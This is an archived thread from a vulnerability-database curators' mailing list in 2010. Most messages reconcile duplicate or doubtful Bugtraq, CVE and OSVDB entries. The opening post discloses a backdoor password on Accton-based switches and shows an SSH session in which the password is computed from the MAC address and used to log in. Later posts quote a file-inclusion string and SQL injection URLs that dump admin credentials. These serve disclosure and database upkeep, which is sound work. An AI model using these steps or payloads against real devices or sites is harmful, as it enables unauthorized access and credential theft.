From teusink at fox-it.com Thu Sep 2 11:20:55 2010
From: teusink at fox-it.com (Niels Teusink)
Date: Thu, 2 Sep 2010 18:20:55 +0200
Subject: [VIM] Backdoor password in some Accton-based gigabit switches (3Com, Dell etc.)
Message-ID:

Hi VIM readers,

On the 15th of August 2009, at the HAR2009 conference, the existence of a backdoor password in Accton-based switches was revealed by Edwin Eefting, Erik Smit and Erwin Drent [1][2]. Even though this is a >365-day exploit, it does not seem to be listed in any of the vulnerability databases. Also, I could not find a patch for any of the vulnerable devices. According to the researchers, they contacted 3Com and Accton, but did not receive a response. I have a vulnerable 3Com 3812 in my lab and contacted the 3Com SRT months ago, but did not receive a response either. This seems to be a forgotten bug...

The Accton company builds switches, which are rebranded and sold by several manufacturers (including 3Com, Dell, SMC, Foundry and EdgeCore). The researchers list at least the 3Com 3812, 3Com 3870 and Edgecore ES4649 as vulnerable [3], but other vendors are affected as well. For example, I could also reproduce the behavior on a Dell PowerConnect 5224 switch.

The backdoor password can be calculated if you have the switch MAC address, which can be obtained via ARP or SNMP (if you know the community string). It seems to work on all management interfaces: telnet, ssh and http. If you don't know the MAC address but can guess the OUI, brute forcing the password is probably feasible as well. A perl script (accton.pl) to calculate the password from the MAC address is available at [4].

I'm hoping that, as a result of this e-mail, this will end up in vulnerability databases, scanners etc. I believe more vulnerable devices will show up as people start scanning their networks.

A sample SSH session with my 3Com 3812, running the latest available firmware (2.00):

$ snmpget -v1 -c public 192.168.104.99 IF-MIB::ifPhysAddress.1001
IF-MIB::ifPhysAddress.1001 = STRING: 0:d:54:9d:1b:90
$ perl accton.pl 0:d:54:9d:1b:90
!F!RELUO
$ ssh __super at 192.168.104.99
__super at 192.168.104.99's password: !F!RELUO

Menu options: -------3Com SuperStack 3 Switch 3812 12-port---------------------
bridge            - Administer bridge-wide parameters
feature           - Administer system features
gettingStarted    - Basic device configuration
logout            - Logout of the Command Line Interface
physicalInterface - Administer physical interfaces
protocol          - Administer protocols
security          - Administer security
system            - Administer system-level functions
trafficManagement - Administer traffic management

Type ? for help.
-------------------------------------(1)--------------------------------------
Select menu option:

Best regards,
Niels

[1] HAR2009 talk https://har2009.org/program/events/103.en.html
[2] HAR2009 slides http://www.vettebak.nl/hak/
[3] Backdoor description http://stuff.zoiah.net/doku.php?id=accton:backdoor
[4] Exploit calculator http://www.vettebak.nl/hak/accton.pl

From theall at tenable.com Thu Sep 2 21:06:49 2010
From: theall at tenable.com (George A. Theall)
Date: Thu, 2 Sep 2010 22:06:49 -0400
Subject: [VIM] CVE / OSVDB id for DB2 APAR
Message-ID: <95E7F0D8-06B0-4AC4-9F5D-52FD4FB5DFD5@tenable.com>

I was looking through a list of security issues in DB2 that IBM recently patched (http://www-01.ibm.com/support/docview.wss?uid=swg21432298) and cross-referencing APARs against CVEs and OSVDBs. I didn't see any mention of the issues IBM labels "SECURITY APAR: MODIFIED SQL DATA table function is not dropped when definer loses required privileges to maintain the objects." (APARs IZ46773, IZ46774, IC63548). All the other issues appear to be covered. Was this missed?

George
--
theall at tenablesecurity.com

From jericho at attrition.org Thu Sep 2 21:11:01 2010
From: jericho at attrition.org (security curmudgeon)
Date: Thu, 2 Sep 2010 21:11:01 -0500 (CDT)
Subject: [VIM] CVE / OSVDB id for DB2 APAR
In-Reply-To: <95E7F0D8-06B0-4AC4-9F5D-52FD4FB5DFD5@tenable.com>
References: <95E7F0D8-06B0-4AC4-9F5D-52FD4FB5DFD5@tenable.com>
Message-ID:

On Thu, 2 Sep 2010, George A. Theall wrote:

: I was looking through a list of security issues in DB2 that IBM recently
: patched (http://www-01.ibm.com/support/docview.wss?uid=swg21432298) and
: cross-referencing APARs against CVEs and OSVDBs. I didn't see any
: mention of the issues IBM labels "SECURITY APAR: MODIFIED SQL DATA table
: function is not dropped when definer loses required privileges to
: maintain the objects." (APARs IZ46773, IZ46774, IC63548). All the other
: issues appear to be covered. Was this missed?

OSVDB 58477

Despite being "recently patched" in one version of DB2, it goes back to 2009-09-28 for the first time we saw a reference to it. The first two APARs are associated with it, the last was not. I will add it now.

Brian

From jericho at attrition.org Thu Sep 2 21:12:00 2010
From: jericho at attrition.org (security curmudgeon)
Date: Thu, 2 Sep 2010 21:12:00 -0500 (CDT)
Subject: [VIM] CVE / OSVDB id for DB2 APAR
In-Reply-To:
References: <95E7F0D8-06B0-4AC4-9F5D-52FD4FB5DFD5@tenable.com>
Message-ID:

: : I was looking through a list of security issues in DB2 that IBM recently
: : patched (http://www-01.ibm.com/support/docview.wss?uid=swg21432298) and
: : cross-referencing APARs against CVEs and OSVDBs. I didn't see any
: : mention of the issues IBM labels "SECURITY APAR: MODIFIED SQL DATA table
: : function is not dropped when definer loses required privileges to
: : maintain the objects." (APARs IZ46773, IZ46774, IC63548). All the other
: : issues appear to be covered. Was this missed?
:
: OSVDB 58477
:
: Despite being "recently patched" in one version of DB2, it goes back to
: 2009-09-28 for the first time we saw a reference to it. The first two
: APARs are associated with it, the last was not. I will add it now.

Correction. The first two were associated via reference, the third was added as a keyword (missed in a reference search). Standardizing so it is a reference as well.

Brian

From theall at tenable.com Mon Sep 6 20:01:01 2010
From: theall at tenable.com (George A. Theall)
Date: Mon, 6 Sep 2010 21:01:01 -0400
Subject: [VIM] Blue CMS `X-Forwarded-For' Header SQL Injection Vulnerability
Message-ID:

Bugtraq 42999 covers a vulnerability based apparently on the advisory published at . The exploit has the string "BlueCMS v1.6 sp1" and involves the script 'comment.php' but doesn't otherwise point to the vendor.

SecurityFocus in its BID references , an English company with a couple of different products, one of which is "Blue CMS". I don't see a download for that product or a demo, though, so I can't be sure. Still, the product description talks about it using Plone, which makes me wonder if the reference isn't wrong.

And indeed, if you search on 'bluecms "v1.6"', one of the top hits uncovered is to http://www.bluecms.net/, a Chinese site, which offers a download for "BlueCMS v1.6 sp1" and seems to require PHP and MySQL. Unfortunately, the download link doesn't work currently.

Any thoughts? Rob?

George
--
theall at tenablesecurity.com

From rkeith at securityfocus.com Tue Sep 7 10:54:46 2010
From: rkeith at securityfocus.com (rkeith)
Date: Tue, 07 Sep 2010 09:54:46 -0600
Subject: [VIM] Blue CMS `X-Forwarded-For' Header SQL Injection Vulnerability
In-Reply-To:
References:
Message-ID: <4C866046.9060408@securityfocus.com>

Hey George,

Thanks for noting that, looks like we had the wrong reference. Updating the BID, should be out shortly.

-Rob

George A. Theall wrote:
> Bugtraq 42999 covers a vulnerability based apparently on the advisory
> published at . The exploit
> has the string "BlueCMS v1.6 sp1" and involves the script 'comment.php'
> but doesn't otherwise point to the vendor.
>
> SecurityFocus in its BID references
> ,
> an English company with a couple of different products, one of which is
> "Blue CMS". I don't see a download for that product or a demo, though, so
> I can't be sure. Still, the product description talks about it using
> Plone, which makes me wonder if the reference isn't wrong.
>
> And indeed, if you search on 'bluecms "v1.6"', one of the top hits
> uncovered is to http://www.bluecms.net/, a Chinese site, which offers a
> download for "BlueCMS v1.6 sp1" and seems to require PHP and MySQL.
> Unfortunately, the download link doesn't work currently.
>
> Any thoughts? Rob?
>
>
> George

--
Rob Keith
Symantec

From che at secunia.com Wed Sep 8 01:51:10 2010
From: che at secunia.com (Carsten H. Eiram)
Date: Wed, 08 Sep 2010 08:51:10 +0200
Subject: [VIM] CVE-2010-3143 vs. CVE-2010-3147
Message-ID: <1283928670.19454.145.camel@ts-hq-1>

These two are basically dupes as Windows Address Book and Windows Contacts are two different names for the same file (wab.exe). The file is referenced as "Windows Address Book" in pre-Vista and "Windows Contacts" in Vista and later.

--
Med venlig hilsen / Kind regards

Carsten H. Eiram
Chief Security Specialist

Follow us on twitter
http://twitter.com/secunia
http://twitter.com/carsteneiram

Secunia
Weidekampsgade 14 A
DK-2300 Copenhagen S
Denmark

Phone +45 7020 5144
Fax +45 7020 5145

From thomas.mackenzie at upsploit.com Thu Sep 9 06:43:56 2010
From: thomas.mackenzie at upsploit.com (Thomas Mackenzie)
Date: Thu, 9 Sep 2010 12:43:56 +0100
Subject: [VIM] upSploit released
Message-ID: <5B260945-0F0D-4DD3-9F39-BF22407F4D0D@upsploit.com>

Hello all,

Just a quick message to make you aware that the Public Beta for upSploit has been released at https://www.upsploit.com

After 30 mins we had our first advisory uploaded :)

Take a look.

Thomas Mackenzie

From noamr at beyondsecurity.com Thu Sep 9 07:32:37 2010
From: noamr at beyondsecurity.com (Noam Rathaus)
Date: Thu, 9 Sep 2010 15:32:37 +0300
Subject: [VIM] upSploit released
In-Reply-To: <5B260945-0F0D-4DD3-9F39-BF22407F4D0D@upsploit.com>
References: <5B260945-0F0D-4DD3-9F39-BF22407F4D0D@upsploit.com>
Message-ID:

Hi

You need to configure in your webserver the chain certificate of GoDaddy, or your SSL certificate will appear to be invalid.

Good luck with your idea

If you need help let me know

On Sep 9, 2010 2:44 PM, "Thomas Mackenzie" wrote:
> Hello all,
>
> Just a quick message to make you aware that the Public Beta for upSploit has been released at https://www.upsploit.com
>
> After 30 mins we had our first advisory uploaded :)
>
> Take a look.
>
> Thomas Mackenzie

-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From theall at tenable.com Fri Sep 10 08:18:36 2010
From: theall at tenable.com (George A. Theall)
Date: Fri, 10 Sep 2010 09:18:36 -0400
Subject: [VIM] ES Simple Download 1.0 Local File Inclusion Vulnerability
Message-ID: <30E8FF21-9116-48C8-8217-92C0DC472F91@tenable.com>

Bugtraq ids 43124 and 43133 both cover a local file include vulnerability in EnergyScripts Simple Download 1.0 involving the 'file' parameter of the 'download.php' script. 43124 uses an exploit that's nearly identical to the one in Exploit DB 14960 while 43133 differs only in the value of 'file'. Both are attributed to Kazza. So, why two BIDs? Rob?

George
--
theall at tenablesecurity.com

From rkeith at securityfocus.com Fri Sep 10 10:12:25 2010
From: rkeith at securityfocus.com (rkeith)
Date: Fri, 10 Sep 2010 09:12:25 -0600
Subject: [VIM] ES Simple Download 1.0 Local File Inclusion Vulnerability
In-Reply-To: <30E8FF21-9116-48C8-8217-92C0DC472F91@tenable.com>
References: <30E8FF21-9116-48C8-8217-92C0DC472F91@tenable.com>
Message-ID: <4C8A4AD9.2060408@securityfocus.com>

Hey George,

Looks like someone didn't see the first when creating the second. We'll have 43133 retired as a duplicate shortly.

-Rob

George A. Theall wrote:
> Bugtraq ids 43124 and 43133 both cover a local file include
> vulnerability in EnergyScripts Simple Download 1.0 involving the 'file'
> parameter of the 'download.php' script. 43124 uses an exploit that's
> nearly identical to the one in Exploit DB 14960 while 43133 differs only
> in the value of 'file'. Both are attributed to Kazza. So, why two BIDs?
> Rob?
>
>
>
> George

--
Rob Keith
Symantec

From thomas.mackenzie at upsploit.com Mon Sep 13 04:20:08 2010
From: thomas.mackenzie at upsploit.com (Thomas Mackenzie)
Date: Mon, 13 Sep 2010 10:20:08 +0100
Subject: [VIM] security contact: xerox
Message-ID:

I am finding it impossible to find one and I have rung up multiple times.

Does anyone have a security contact for Xerox?

Thanks,

Tom

From jericho at attrition.org Mon Sep 13 16:41:23 2010
From: jericho at attrition.org (security curmudgeon)
Date: Mon, 13 Sep 2010 16:41:23 -0500 (CDT)
Subject: [VIM] security contact: xerox
In-Reply-To:
References:
Message-ID:

: I am finding it impossible to find one and I have rung up multiple times.
:
: Does anyone have a security contact for Xerox?

http://www.xerox.com/information-security/enus.html

Larry Kovnat, manager of product security at Xerox

Security queries:
http://www.xerox.com/perl-bin/formeng.pl?form=product_security_information_request_7285

From theall at tenable.com Wed Sep 15 21:12:07 2010
From: theall at tenable.com (George A. Theall)
Date: Wed, 15 Sep 2010 22:12:07 -0400
Subject: [VIM] MOAUB #15 - Ipswitch Imail Server List Mailer Reply-To Address Memory Corruption
Message-ID: <9C5EA8D9-AF97-4347-9112-0A0F93BC0697@tenable.com>

Abyssec published an advisory today concerning a memory corruption issue in Ipswitch Imail that's triggered with multiple long Reply-To headers:

http://www.exploit-db.com/moaub-15-ipswitch-imail-server-list-mailer-reply-to-address-memory-corruption/

I see that SecurityFocus has added this as an additional PoC in BID 41717, suggesting it's the same as the issue covered by ZDI-10-126. While the advisories are very similar, I think there are really two distinct issues at play here. That is, ZDI claims the issue has been addressed by iMail 11.02 while Abyssec lists versions 11.01 and 11.02 as affected. And more significantly, Ipswitch themselves have responded already to Abyssec's advisory with a patch:

http://kb.imailserver.com/cgi-bin/imail.cfg/php/enduser/std_adp.php?p_faqid=1197

Thoughts? Rob?

George
--
theall at tenablesecurity.com

From rkeith at securityfocus.com Thu Sep 16 12:11:36 2010
From: rkeith at securityfocus.com (rkeith)
Date: Thu, 16 Sep 2010 11:11:36 -0600
Subject: [VIM] MOAUB #15 - Ipswitch Imail Server List Mailer Reply-To Address Memory Corruption
In-Reply-To: <9C5EA8D9-AF97-4347-9112-0A0F93BC0697@tenable.com>
References: <9C5EA8D9-AF97-4347-9112-0A0F93BC0697@tenable.com>
Message-ID: <4C924FC8.4050401@securityfocus.com>

Hey George,

This is an interesting one and you may be correct. Doesn't help that ZDI doesn't disclose a source or any significant details. We'll err on the safe side and create a second BID for this issue.

Thanks,
Rob

George A. Theall wrote:
> Abyssec published an advisory today concerning a memory corruption issue
> in Ipswitch Imail that's triggered with multiple long Reply-To headers:
>
>
> http://www.exploit-db.com/moaub-15-ipswitch-imail-server-list-mailer-reply-to-address-memory-corruption/
>
>
> I see that SecurityFocus has added this as an additional PoC in BID
> 41717, suggesting it's the same as the issue covered by ZDI-10-126.
> While the advisories are very similar, I think there are really two
> distinct issues at play here. That is, ZDI claims the issue has been
> addressed by iMail 11.02 while Abyssec lists versions 11.01 and 11.02 as
> affected. And more significantly, Ipswitch themselves have responded
> already to Abyssec's advisory with a patch:
>
>
> http://kb.imailserver.com/cgi-bin/imail.cfg/php/enduser/std_adp.php?p_faqid=1197
>
>
> Thoughts? Rob?
>
> George

--
Rob Keith
Symantec

From theall at tenable.com Fri Sep 17 20:57:18 2010
From: theall at tenable.com (George A. Theall)
Date: Fri, 17 Sep 2010 21:57:18 -0400
Subject: [VIM] Storyteller CMS (var) Local File Inclusion Vulnerability
Message-ID:

BorN To K!LL reported a local file inclusion vulnerability in StoryTeller CMS -- covered by Exploit DB 14996 / Bugtraq 43201 -- and offers the following code snippet from 'core.php':

    function GetTemplate($var) {
        if (file_exists("templates/$var.tmp.php")) {
            require("templates/$var.tmp.php");
        } else {
            die ("Error: Can't open template $var");
        }
        return $EST_TEMPLATE;
    }

as well as the following POC:

    /core.php?var=[Local-File]%00

How's that exploitable? The file only uses '$var' as an argument in various functions. And there's no way I see for an attacker to control input to 'GetTemplate()'.

George
--
theall at tenablesecurity.com

From theall at tenable.com Sat Sep 18 19:15:10 2010
From: theall at tenable.com (George A. Theall)
Date: Sat, 18 Sep 2010 20:15:10 -0400
Subject: [VIM] Esvon Classifieds 4.0 Multiple Vulnerabilities
Message-ID: <5A943C5B-D6E8-4556-B8C9-F8E7455AEB99@tenable.com>

Sn!pEr.S!Te reported some vulnerabilities in Esvon Classifieds 4.0 -- covered by Exploit DB 14817 / Bugtraq 42819 -- that look bogus to me.

The first is a command execution issue involving the 'sql' parameter in 'inc/pdo.inc.php'. Looking at the copy of the file attached to the Exploit DB advisory, the file in question comes into play only if the function 'mysql_connect' does not exist and the 'PDO' class does, and it consists of a series of function definitions that extend the PDO class, but none that an attacker can reach by calling the file directly. I'm also not sure exactly which code Sn!pEr.S!Te sees as a problem; perhaps:

    class esPDO extends PDO {
        var $_aff_rows = 0;

        function exec($sql){
            return $this->_aff_rows = parent::exec($sql);

Grep & gripe perhaps?

The other issue is a local file inclusion issue in 'inc/class.phpmailer.php'. The trouble is, that file simply defines a class -- an attacker can't reach any of the functions in it by calling the file directly. And even if you could, the only instance where 'lang_type' comes into play is this:

    function SetLanguage($lang_type, $lang_path = 'language/') {
        /*if(file_exists($lang_path.'phpmailer.lang-'.$lang_type.'.php')) {
            include($lang_path.'phpmailer.lang-'.$lang_type.'.php');
        } elseif (file_exists($lang_path.'phpmailer.lang-en.php')) {
            include($lang_path.'phpmailer.lang-en.php');
        } else {*/

Note the multiline comment means there's no issue even if you could somehow call that function.

George
--
theall at tenablesecurity.com

From theall at tenable.com Sat Sep 18 20:03:54 2010
From: theall at tenable.com (George A. Theall)
Date: Sat, 18 Sep 2010 21:03:54 -0400
Subject: [VIM] Bugtraq IDs 43086 and 43127
Message-ID: <90A6E269-7486-4B46-A8AA-6269AA65D183@tenable.com>

What's the difference between Bugtraq ids 43086 and 43127? Both seem to cover the same vulnerability reported over a year ago and covered by EDB-ID 9441.

George
--
theall at tenablesecurity.com

From rkeith at securityfocus.com Mon Sep 20 10:37:22 2010
From: rkeith at securityfocus.com (rkeith)
Date: Mon, 20 Sep 2010 09:37:22 -0600
Subject: [VIM] Bugtraq IDs 43086 and 43127
In-Reply-To: <90A6E269-7486-4B46-A8AA-6269AA65D183@tenable.com>
References: <90A6E269-7486-4B46-A8AA-6269AA65D183@tenable.com>
Message-ID: <4C977FB2.4080808@securityfocus.com>

Hey George,

We will be retiring 43127 shortly as a duplicate.

Thanks,
Rob

George A. Theall wrote:
> What's the difference between Bugtraq ids 43086 and 43127? Both seem to
> cover the same vulnerability reported over a year ago and covered by
> EDB-ID 9441.
>
> George

From theall at tenable.com Tue Sep 21 12:21:08 2010
From: theall at tenable.com (George A. Theall)
Date: Tue, 21 Sep 2010 13:21:08 -0400
Subject: [VIM] Bugtraq IDs 32763 and 42836
Message-ID:

It seems like Bugtraq ID 42836 covers one of the vulnerabilities in Max's Guestbook already covered by Bugtraq ID 32763 -- failure to sanitize input to the 'name' parameter.

While the newer BID talks about this parameter in "the 'Comment' section", I'm not clear what that is or if it's different from a guestbook message itself. I don't find mention of 'comment' in the PHP code. Nor do I see it in any live sites I've looked at.

Rob?

George
--
theall at tenablesecurity.com

From theall at tenable.com Tue Sep 21 12:37:47 2010
From: theall at tenable.com (George A. Theall)
Date: Tue, 21 Sep 2010 13:37:47 -0400
Subject: [VIM] Bugtraq IDs 42539 and 43257
Message-ID: <29A7E69E-4428-4D3D-8DE3-2D5262F6D3BC@tenable.com>

It looks like Bugtraq IDs 42539 and 43257 are covering the same vulnerability -- a SQL injection involving the cid parameter of shop.htm in PPScript.

Rob?

George
--
theall at tenablesecurity.com

From rkeith at securityfocus.com Tue Sep 21 12:49:04 2010
From: rkeith at securityfocus.com (rkeith)
Date: Tue, 21 Sep 2010 11:49:04 -0600
Subject: [VIM] Bugtraq IDs 42539 and 43257
In-Reply-To: <29A7E69E-4428-4D3D-8DE3-2D5262F6D3BC@tenable.com>
References: <29A7E69E-4428-4D3D-8DE3-2D5262F6D3BC@tenable.com>
Message-ID: <4C98F010.4030005@securityfocus.com>

Hey George,

Looks like 43257 has some of the facts incorrect too. We will retire that one shortly as a duplicate.

Thanks,
Rob

George A. Theall wrote:
> It looks like Bugtraq IDs 42539 and 43257 are covering the same
> vulnerability -- a SQL injection involving the cid parameter of shop.htm
> in PPScript.
>
> Rob?
>
>
> George

--
Rob Keith
Symantec

From rkeith at securityfocus.com Tue Sep 21 13:30:26 2010
From: rkeith at securityfocus.com (rkeith)
Date: Tue, 21 Sep 2010 12:30:26 -0600
Subject: [VIM] Bugtraq IDs 32763 and 42836
In-Reply-To:
References:
Message-ID: <4C98F9C2.6060208@securityfocus.com>

I agree, looks like the only 'name' is in a new guestbook entry. We will be retiring 42836 shortly.

Thanks again George.

-Rob

George A. Theall wrote:
> It seems like Bugtraq ID 42836 covers one of the vulnerabilities in
> Max's Guestbook already covered by Bugtraq ID 32763 -- failure to
> sanitize input to the 'name' parameter.
>
> While the newer BID talks about this parameter in "the 'Comment'
> section", I'm not clear what that is or if it's different from a
> guestbook message itself. I don't find mention of 'comment' in the PHP
> code. Nor do I see it in any live sites I've looked at.
>
> Rob?
>
>
> George

From coley at linus.mitre.org Wed Sep 22 12:47:25 2010
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 22 Sep 2010 13:47:25 -0400 (EDT)
Subject: [VIM] MOAUB #15 - PHP MicroCMS 1.0.1
Message-ID:

Researcher: abysssec.com
http://www.exploit-db.com/exploits/15011/

Abysssec claims both username and password are affected, but their source extract of get_account_information() shows that the password is passed into an AES_ENCRYPT function, which presumably prevents SQL syntax from being injected. Yet various VDBs also list the password.

Has anybody investigated this further?

- Steve

From theall at tenable.com Tue Sep 28 10:22:49 2010
From: theall at tenable.com (George A. Theall)
Date: Tue, 28 Sep 2010 11:22:49 -0400
Subject: [VIM] Bugtraq IDs 43479 and 43523
Message-ID:

What's the difference between Bugtraq IDs 43479 and 43523, Rob? Both seem to have been created yesterday for an issue tracked by CVE-2009-2592 and reported in July 2009.

George
--
theall at tenablesecurity.com

From rkeith at securityfocus.com Tue Sep 28 13:14:42 2010
From: rkeith at securityfocus.com (rkeith)
Date: Tue, 28 Sep 2010 12:14:42 -0600
Subject: [VIM] Bugtraq IDs 43479 and 43523
In-Reply-To:
References:
Message-ID: <4CA23092.2010909@securityfocus.com>

No difference, unfortunately. BID 43523 has been retired.

-Rob

George A. Theall wrote:
> What's the difference between Bugtraq IDs 43479 and 43523, Rob? Both
> seem to have been created yesterday for an issue tracked by
> CVE-2009-2592 and reported in July 2009.
>
>
> George

From theall at tenable.com Tue Sep 28 14:38:36 2010
From: theall at tenable.com (George A. Theall)
Date: Tue, 28 Sep 2010 15:38:36 -0400
Subject: [VIM] Bugtraq IDs 43479 and 43523
In-Reply-To: <4CA23092.2010909@securityfocus.com>
References: <4CA23092.2010909@securityfocus.com>
Message-ID:

On Sep 28, 2010, at 2:14 PM, rkeith wrote:

> No difference, unfortunately. BID 43523 has been retired.

Looks like the earlier BID isn't valid either:

http://developers.phpjunkyard.com/viewtopic.php?f=7&t=2711

and by extension CVE-2009-2592 / OSVDB 56552. Indeed, looking at the source, I don't see any SQL statements or mention of a 'mes_id' parameter / guestbook.php script.

> -Rob
>
> George A. Theall wrote:
>> What's the difference between Bugtraq IDs 43479 and 43523, Rob? Both
>> seem to have been created yesterday for an issue tracked by
>> CVE-2009-2592 and reported in July 2009.
>>
>>
>> George
>

George
--
theall at tenablesecurity.com

From coley at linus.mitre.org Wed Sep 29 10:40:40 2010
From: coley at linus.mitre.org (Steven M. Christey)
Date: Wed, 29 Sep 2010 11:40:40 -0400 (EDT)
Subject: [VIM] Oracle CPU advisory URLs changed/broken
Message-ID:

Looks like all the Oracle CPU advisory URLs got changed without redirecting to their new location. Near as I can tell, we have:

http://www.oracle.com/technetwork/topics/security/alerts-086861.html#CriticalPatchUpdates

This change breaks approximately 750 URLs in CVE.

- Steve

From theall at tenable.com Thu Sep 30 11:40:51 2010
From: theall at tenable.com (George A. Theall)
Date: Thu, 30 Sep 2010 12:40:51 -0400
Subject: [VIM] Bugtraq Ids 37702 vs 43591
Message-ID: <33BF5074-4B23-42D3-8B45-D3EC700126A9@tenable.com>

The newly-created Bugtraq Id 43591 covers a SQL injection in a product named MyPhpAuction -- apparently user input to the 'id' parameter of 'product_desc.php' is not sanitized before being used in a database query. SecurityFocus gives as a PoC:

http://www.example.com/product_desc.php?id=-5+union+all+select+1,2,concat(admin_name,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin--

Notice the "zeeauctions_admin"? Looks like the product is just a rebranded version of that, no? And indeed, if you go to the product page (http://galaxyscriptz.com/products/MyPhpAuction-2010.html), you'll notice the demo links to http://www.canadianelitehosting.com/Demos/ZeeAuctions/ , which appears to be that based on its banner.

Given this, the BID seems to be a dup of BID 37702, which gives as a PoC:

http://www.example.com/auction/product_desc.php?id=-1/**/union/**/select/**/1,2,concat%28admin_name,0x3a3a3a,pwd%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_adm

I'm not clear about the attribution, but this seems to correspond to EDB Id 11047 although it's been truncated (cut-and-paste error?).

Taking this into consideration, these two BIDs seem to be duplicates. Rob, did you guys at SecurityFocus look into this at all?

George
--
theall at tenablesecurity.com

From rkeith at securityfocus.com Thu Sep 30 14:49:57 2010
From: rkeith at securityfocus.com (rkeith)
Date: Thu, 30 Sep 2010 13:49:57 -0600
Subject: [VIM] Bugtraq Ids 37702 vs 43591
In-Reply-To: <33BF5074-4B23-42D3-8B45-D3EC700126A9@tenable.com>
References: <33BF5074-4B23-42D3-8B45-D3EC700126A9@tenable.com>
Message-ID: <4CA4E9E5.70807@securityfocus.com>

Hey George,

We concur with this, and will be retiring 43591 shortly.

Cheers,
Rob

George A. Theall wrote:
> The newly-created Bugtraq Id 43591 covers a SQL injection in a product
> named MyPhpAuction -- apparently user input to the 'id' parameter of
> 'product_desc.php' is not sanitized before being used in a database
> query. SecurityFocus gives as a PoC:
>
>
> http://www.example.com/product_desc.php?id=-5+union+all+select+1,2,concat(admin_name,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin--
>
>
> Notice the "zeeauctions_admin"? Looks like the product is just a
> rebranded version of that, no? And indeed, if you go to the product page
> (http://galaxyscriptz.com/products/MyPhpAuction-2010.html), you'll
> notice the demo links to
> http://www.canadianelitehosting.com/Demos/ZeeAuctions/, which appears to
> be that based on its banner.
>
> Given this, the BID seems to be a dup of BID 37702, which gives as a PoC:
>
>
> http://www.example.com/auction/product_desc.php?id=-1/**/union/**/select/**/1,2,concat%28admin_name,0x3a3a3a,pwd%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_adm
>
>
> I'm not clear about the attribution, but this seems to correspond to EDB
> Id 11047 although it's been truncated (cut-and-paste error?).
>
> Taking this into consideration, these two BIDs seem to be duplicates.
> Rob, did you guys at SecurityFocus look into this at all?
>
>
> George